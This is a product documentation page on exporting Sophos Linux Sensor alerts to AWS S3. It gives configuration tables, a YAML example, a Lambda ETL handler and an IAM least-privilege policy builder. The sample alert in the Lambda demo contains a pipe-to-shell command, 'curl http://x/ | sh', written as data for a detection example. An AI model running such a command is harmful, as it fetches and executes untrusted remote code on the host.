
Exporting Alerts to S3

The blobstorage output type writes each alert to its own file in an AWS S3 bucket. Sophos Linux Sensor (SLS) can optionally create the target bucket (or buckets) itself, provided the credentials it runs with have sufficient permissions.

Access to the S3 bucket can be granted either explicitly, by specifying an access key ID and secret access key in the config, or implicitly, by granting role-based access to the service that runs SLS (for example the EC2 instance role). The implicit form avoids storing long-lived credentials on the sensor host.

This output type is commonly used for simple archiving of alerts in a durable store. It can also serve as the trigger for an ETL process: in cloud environments, the blob storage write event invokes a cloud function that processes the incoming alert, which can then be enriched, transformed, and shipped to other systems as needed.
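The trigger-driven ETL flow above, as an added example that is not Sophos code: a minimal AWS Lambda handler that receives the S3 ObjectCreated notification for a newly written alert file, loads the object, tags it with its provenance and hands it to a sink. The S3 client and sink are injectable so the function runs offline against an in-memory stand-in. Assumptions, labelled in the code: alert files are JSON documents (the page does not state the encoding), the bucket name sophos-alerts, and the alert fields in the constructed sample.

```python
"""Added example (not Sophos Linux Sensor code): Lambda handler for S3 write events."""
import io
import json
import urllib.parse

# Buckets this function is willing to read from (assumed names). A Lambda only
# receives events from buckets it is subscribed to, but this check is cheap
# defense in depth against a mis-wired notification.
ALLOWED_BUCKETS = {"sophos-alerts"}
# One SLS alert per file is expected, so refuse to load oversized objects.
MAX_OBJECT_BYTES = 1024 * 1024


def parse_s3_event(event):
    """Yield (bucket, key, size) for each ObjectCreated record in a Lambda S3 event."""
    for rec in event.get("Records", []):
        if not rec.get("eventName", "").startswith("ObjectCreated:"):
            continue
        s3 = rec["s3"]
        bucket = s3["bucket"]["name"]
        # S3 URL-encodes object keys in event notifications (spaces arrive as '+').
        key = urllib.parse.unquote_plus(s3["object"]["key"])
        yield bucket, key, int(s3["object"].get("size", 0))


def load_alert(s3_client, bucket, key):
    """Fetch one alert file and decode it as JSON (assumed alert encoding)."""
    body = s3_client.get_object(Bucket=bucket, Key=key)["Body"].read()
    return json.loads(body)


def enrich(alert, bucket, key):
    """Attach provenance so downstream systems can trace the alert back to its object."""
    out = dict(alert)
    out["_source"] = {"provider": "aws", "bucket": bucket, "key": key}
    return out


def handler(event, context=None, s3_client=None, sink=None):
    """Lambda entry point; returns what was processed and what was skipped."""
    if s3_client is None:
        import boto3  # present in the Lambda runtime; not needed for the offline demo
        s3_client = boto3.client("s3")
    processed, skipped = [], []
    for bucket, key, size in parse_s3_event(event):
        if bucket not in ALLOWED_BUCKETS or size > MAX_OBJECT_BYTES:
            skipped.append(key)
            continue
        try:
            alert = load_alert(s3_client, bucket, key)
        except ValueError:  # json.JSONDecodeError is a ValueError
            skipped.append(key)
            continue
        record = enrich(alert, bucket, key)
        if sink is not None:
            sink(record)  # e.g. forward to a SIEM or message queue
        processed.append(record)
    return {"processed": processed, "skipped": skipped}


class _FakeS3:
    """Stand-in for boto3's S3 client backed by an in-memory dict (constructed)."""

    def __init__(self, objects):
        self._objects = objects

    def get_object(self, Bucket, Key):
        return {"Body": io.BytesIO(self._objects[(Bucket, Key)])}


# Constructed sample alert; field names are illustrative, not the SLS schema.
SAMPLE_ALERT = json.dumps({
    "alert_id": "a1b2", "policy": "Suspicious Shell Spawned", "severity": "high",
    "hostname": "web-01", "process": {"name": "bash", "args": ["-c", "curl http://x/ | sh"]},
}).encode()


def sample_event(bucket, key):
    """Build one ObjectCreated record the way S3 would deliver it (key URL-encoded)."""
    return {"Records": [{
        "eventName": "ObjectCreated:Put",
        "s3": {"bucket": {"name": bucket},
               "object": {"key": urllib.parse.quote_plus(key), "size": len(SAMPLE_ALERT)}},
    }]}


def run_demo():
    """Offline run: one valid alert, one non-JSON object, one event from a foreign bucket."""
    good_key = "prod/alert 0001.json"
    fake = _FakeS3({("sophos-alerts", good_key): SAMPLE_ALERT,
                    ("sophos-alerts", "prod/garbage.json"): b"not json"})
    event = {"Records": sample_event("sophos-alerts", good_key)["Records"]
             + sample_event("sophos-alerts", "prod/garbage.json")["Records"]
             + sample_event("other-bucket", "x.json")["Records"]}
    return handler(event, s3_client=fake)


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Objects that fail to parse are skipped rather than raised so that one malformed file does not block the batch; a production deployment would route those keys to a dead-letter queue.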

Configuration:

Key            Required  Description
type           yes       The output type (blobstorage for this output).
enabled        yes       Enables/disables the output.
provider       yes       The cloud provider name.
bucket_name    yes       The name of the bucket to write to. A subpath within the bucket can be specified by appending it to the bucket name, delimited with a /.
create_bucket  no        Enables/disables bucket creation.

AWS-specific configuration:

Key                    Required  Description
aws_region             yes       The AWS region.
aws_access_key_id      no        The AWS Access Key ID.
aws_secret_access_key  no        The AWS Secret Access Key.
aws_session_token      no        The AWS Session Token.
aws_acl                no        An ACL string such as "bucket-owner-full-control" to add to the request. Requires s3:PutObjectAcl permissions.
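Putting the two tables to work, as an added example that is not part of SLS or its documentation: a small Python helper that splits a bucket_name into bucket and subpath, flags outputs that embed static keys instead of relying on a role, and derives the S3 IAM statements the configured options imply (s3:PutObject scoped to the subpath, s3:PutObjectAcl only when aws_acl is set, s3:CreateBucket only when create_bucket is enabled). The action list is an assumption drawn from the options documented above, not an SLS requirements list; SLS may make additional calls (for example checking whether a bucket already exists before creating it), so confirm the final policy against AccessDenied events in CloudTrail. The sample config is constructed.

```python
"""Added example (not SLS code): least-privilege IAM statements from a blobstorage output config."""
import json

OBJECT_WRITE_ACTIONS = ["s3:PutObject"]  # assumed minimum for writing alert files


def split_bucket_name(bucket_name):
    """'sophos-alerts/prod/eu' -> ('sophos-alerts', 'prod/eu'); a bare name gives an empty prefix."""
    bucket, _, prefix = bucket_name.strip("/").partition("/")
    if not bucket:
        raise ValueError("bucket_name must start with a bucket name")
    return bucket, prefix.strip("/")


def object_resource(bucket, prefix):
    """ARN pattern covering only the keys written under the configured subpath."""
    return f"arn:aws:s3:::{bucket}/{prefix}/*" if prefix else f"arn:aws:s3:::{bucket}/*"


def uses_static_keys(output):
    """True when the output embeds long-lived credentials rather than relying on a role."""
    return bool(output.get("aws_access_key_id") or output.get("aws_secret_access_key"))


def iam_policy_for(output):
    """Build the IAM policy document implied by one AWS blobstorage output."""
    if output.get("type") != "blobstorage" or output.get("provider") != "aws":
        raise ValueError("only AWS blobstorage outputs are handled here")
    bucket, prefix = split_bucket_name(output["bucket_name"])
    actions = list(OBJECT_WRITE_ACTIONS)
    if output.get("aws_acl"):
        actions.append("s3:PutObjectAcl")  # documented requirement when aws_acl is set
    statements = [{"Sid": "WriteAlerts", "Effect": "Allow", "Action": actions,
                   "Resource": object_resource(bucket, prefix)}]
    if output.get("create_bucket"):
        statements.append({"Sid": "CreateBucket", "Effect": "Allow",
                           "Action": ["s3:CreateBucket"],
                           "Resource": f"arn:aws:s3:::{bucket}"})
    return {"Version": "2012-10-17", "Statement": statements}


# Constructed config: like the page's example but scoped to a subpath and with
# no static keys, i.e. relying on the role attached to the host running SLS.
ROLE_BASED_OUTPUT = {
    "type": "blobstorage", "enabled": True, "create_bucket": False,
    "bucket_name": "sophos-alerts/prod/eu", "provider": "aws",
    "aws_region": "us-east-2", "aws_acl": "bucket-owner-full-control",
}

if __name__ == "__main__":
    if uses_static_keys(ROLE_BASED_OUTPUT):
        print("warning: output embeds static AWS keys; prefer an instance role")
    print(json.dumps(iam_policy_for(ROLE_BASED_OUTPUT), indent=2))
```

Scoping the Resource to the subpath means a compromised sensor host can add alert files under its own prefix but cannot read, overwrite or list anything else in the bucket.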

Example: sending alerts to AWS S3, authenticating with access keys:

alert_output:
  outputs:
    # Write each alert to AWS S3, authenticating with static access keys.
    # Reference the keys as variables rather than pasting literals into the file.
    - type: blobstorage
      enabled: true
      create_bucket: true
      bucket_name: sophos-alerts
      provider: aws
      # Omit the two key settings below to use the instance role instead.
      aws_access_key_id: $ACCESS_KEY_ID
      aws_secret_access_key: $SECRET_ACCESS_KEY
      aws_region: us-east-2
      # Requires s3:PutObjectAcl; useful when the bucket belongs to another account.
      aws_acl: "bucket-owner-full-control"